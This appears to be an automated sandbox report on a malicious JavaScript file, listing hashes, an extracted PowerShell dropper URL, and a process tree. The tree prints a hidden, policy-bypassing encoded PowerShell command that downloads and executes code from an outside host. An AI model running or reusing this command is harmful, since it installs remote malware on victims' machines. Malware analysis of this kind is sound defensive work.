Analysis

  • max time kernel
    0s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/01/2024, 20:31

General

  • Target

    545c6dfa821390d6601750e65828543b.js

  • Size

    69KB

  • MD5

    545c6dfa821390d6601750e65828543b

  • SHA1

    7212c76c1e23c93613ac14726d55db8119a958be

  • SHA256

    e39037aac299ed46ba0f22a0b3466c323ecb86a09c835e74ff4a33e7547407b1

  • SHA512

    d72c0a2e852d4d0865eab657a902aaa9e8718ad8bafde59cf6afb2522c6ec5d73d3b9e332ae96faf4fd8412ff4a4a72b02fcfa4c9f637cf82eb9ae0342e37775

  • SSDEEP

    1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/or:59Ry98guHVBqqg2bcruzUHmLKeMMU7Gd

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://smart-integrator.hr/pornhub.php

Signatures

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\545c6dfa821390d6601750e65828543b.js
    1⤵
      PID:1692
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
        2⤵
          PID:924
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
            3⤵
              PID:5052

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/5052-13-0x000001ECEAFD0000-0x000001ECEAFE0000-memory.dmp

                Filesize

                64KB

              • memory/5052-12-0x000001ECEAFD0000-0x000001ECEAFE0000-memory.dmp

                Filesize

                64KB

              • memory/5052-11-0x00007FFFD75A0000-0x00007FFFD8061000-memory.dmp

                Filesize

                10.8MB

              • memory/5052-1-0x000001ECEAA10000-0x000001ECEAA32000-memory.dmp

                Filesize

                136KB

              • memory/5052-16-0x00007FFFD75A0000-0x00007FFFD8061000-memory.dmp

                Filesize

                10.8MB